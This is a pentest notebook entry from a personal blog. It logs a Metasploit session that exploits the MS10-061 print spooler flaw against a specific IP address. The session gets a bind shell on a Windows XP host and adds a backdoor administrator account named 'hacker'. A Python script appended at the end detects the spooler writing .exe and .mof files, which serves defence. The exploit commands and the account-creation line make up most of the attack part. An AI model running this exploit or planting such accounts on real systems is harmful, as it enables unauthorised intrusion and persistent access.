Pentest Notes 2013-07-13
2013-07-13 10:35
Migrated over from my old Sina blog.
ms10_061_spoolss
This post is from the “文东会” blog; please contact the author before reprinting!
[*] Please wait while the Metasploit Pro Console initializes...
[*] Starting Metasploit Console...

       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 840 exploits - 495 auxiliary - 146 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops

[*] Successfully loaded plugin: pro

msf > search ms10_061

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/windows/smb/ms10_061_spoolss  2010-09-14       excellent  Microsoft Print Spooler Service Impersonation Vulnerability

msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > info

       Name: Microsoft Print Spooler Service Impersonation Vulnerability
     Module: exploit/windows/smb/ms10_061_spoolss
    Version: 14976
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  jduck <jduck@metasploit.com>
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Windows Universal

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PNAME                     no        The printer share name to use on the target
  RHOST                     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  spoolss          no        The named pipe for the spooler service

Payload information:
  Space: 1024
  Avoid: 0 characters

Description:
  This module exploits the RPC service impersonation vulnerability detailed in
  Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the
  StartDocPrinter procedure, an attacker can impersonate the Printer Spooler
  service to create a file. The working directory at the time is
  %SystemRoot%\system32. An attacker can specify any file name, including
  directory traversal or full paths. By sending WritePrinter requests, an
  attacker can fully control the content of the created file. In order to gain
  code execution, this module writes to a directory used by Windows Management
  Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is
  periodically scanned and any new .mof files are processed automatically. This
  is the same technique employed by the Stuxnet code found in the wild.

References:
  http://www.osvdb.org/67988
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
  http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx

msf exploit(ms10_061_spoolss) > set RHOST 142.168.2.20
RHOST => 142.168.2.20
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms10_061_spoolss) > info

       Name: Microsoft Print Spooler Service Impersonation Vulnerability
     Module: exploit/windows/smb/ms10_061_spoolss
    Version: 14976
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  jduck <jduck@metasploit.com>
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Windows Universal

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PNAME                     no        The printer share name to use on the target
  RHOST    142.168.2.20     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  spoolss          no        The named pipe for the spooler service

Payload information:
  Space: 1024
  Avoid: 0 characters

Description:
  This module exploits the RPC service impersonation vulnerability detailed in
  Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the
  StartDocPrinter procedure, an attacker can impersonate the Printer Spooler
  service to create a file. The working directory at the time is
  %SystemRoot%\system32. An attacker can specify any file name, including
  directory traversal or full paths. By sending WritePrinter requests, an
  attacker can fully control the content of the created file. In order to gain
  code execution, this module writes to a directory used by Windows Management
  Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is
  periodically scanned and any new .mof files are processed automatically. This
  is the same technique employed by the Stuxnet code found in the wild.

References:
  http://www.osvdb.org/67988
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
  http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx

msf exploit(ms10_061_spoolss) > exploit

[*] Started bind handler
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:142.168.2.20[\spoolss] ...
[*] Attempting to exploit MS10-061 via \\142.168.2.20\SmartPrinter ...
[*] Printer handle: 00000000950606c7fee7b348bc5b841597479b61
[*] Job started: 0x4
[*] Wrote 73802 bytes to %SystemRoot%\system32\9o43IDgKLE0SjU.exe
[*] Job started: 0x5
[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\vWMbWpPJt8K6aD.mof
[*] Everything should be set, waiting for a session...
[*] Sending stage (240 bytes) to 142.168.2.20

Microsoft Windows XP [???? 5.1.2600]
(C) ???????? 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

\\ ??????????

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
IUSR_INTRA-PC            IWAM_INTRA-PC            shentouceshiwy
SUPPORT_388945a0
????????????????????????????????????

C:\WINDOWS\system32>net user hacker 123 /add & net localgroup administrators hacker /add
net user hacker 123 /add & net localgroup administrators hacker /add
??????????????

??????????????

C:\WINDOWS\system32>net user
net user

\\ ??????????

-------------------------------------------------------------------------------
Administrator            Guest                    hacker
HelpAssistant            IUSR_INTRA-PC            IWAM_INTRA-PC
shentouceshiwy           SUPPORT_388945a0
????????????????????????????????????

C:\WINDOWS\system32>
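The session above shows the two on-disk artifacts MS10-061 leaves behind: the spooler process writing an executable straight into %SystemRoot%\system32, and then a .mof file into wbem\mof for WMI to compile. The following detection logic is an added example written for this post (not part of the original notes or the Metasploit module): it runs two rules over constructed file-create events shaped like Sysmon Event ID 11 records, where the `Image` and `TargetFilename` field names and the sample data are assumptions.

```python
import re

# Constructed sample events shaped like Sysmon Event ID 11 (FileCreate) records:
# Image = process that created the file, TargetFilename = path written.
# Hypothetical data; the two suspicious paths mirror the ones in the session above.
SAMPLE_EVENTS = [
    {"Image": r"C:\WINDOWS\system32\spoolsv.exe",
     "TargetFilename": r"C:\WINDOWS\system32\spool\PRINTERS\00003.SPL"},      # normal spooling
    {"Image": r"C:\WINDOWS\system32\spoolsv.exe",
     "TargetFilename": r"C:\WINDOWS\system32\9o43IDgKLE0SjU.exe"},            # payload written by spooler
    {"Image": r"C:\WINDOWS\system32\spoolsv.exe",
     "TargetFilename": r"C:\WINDOWS\system32\wbem\mof\vWMbWpPJt8K6aD.mof"},   # MOF that WMI will auto-compile
    {"Image": r"C:\WINDOWS\system32\msiexec.exe",
     "TargetFilename": r"C:\WINDOWS\system32\wbem\mof\good\ProductWmi.mof"},  # installer activity, expected
]

# StartDocPrinter creates the file relative to %SystemRoot%\system32 and WritePrinter fills it,
# so in this technique the writing process is always spoolsv.exe. Two rules cover both drops.
MOF_DROP = re.compile(r"\\system32\\wbem\\mof\\[^\\]+\.mof$", re.IGNORECASE)
SYS32_EXE = re.compile(r"\\system32\\[^\\]+\.exe$", re.IGNORECASE)


def classify(event):
    """Return a rule name if this FileCreate event matches the MS10-061 pattern, else None."""
    image = event["Image"].lower()
    target = event["TargetFilename"]
    if not image.endswith(r"\spoolsv.exe"):
        return None
    if MOF_DROP.search(target):
        return "spooler-wrote-mof"          # new .mof directly in wbem\mof is auto-processed
    if SYS32_EXE.search(target):
        return "spooler-wrote-executable"   # the spooler has no reason to drop binaries here
    return None


def detect(events):
    """Run both rules over a list of events; returns [(rule, path), ...] in event order."""
    hits = []
    for ev in events:
        rule = classify(ev)
        if rule:
            hits.append((rule, ev["TargetFilename"]))
    return hits


if __name__ == "__main__":
    for rule, path in detect(SAMPLE_EVENTS):
        print(f"{rule}: {path}")
```

The spool-file write and the installer's .mof are left alone, so the rules fire only on the two artifacts this module actually produces; applying MS10-061 remains the fix, the detection just catches hosts that were hit before patching.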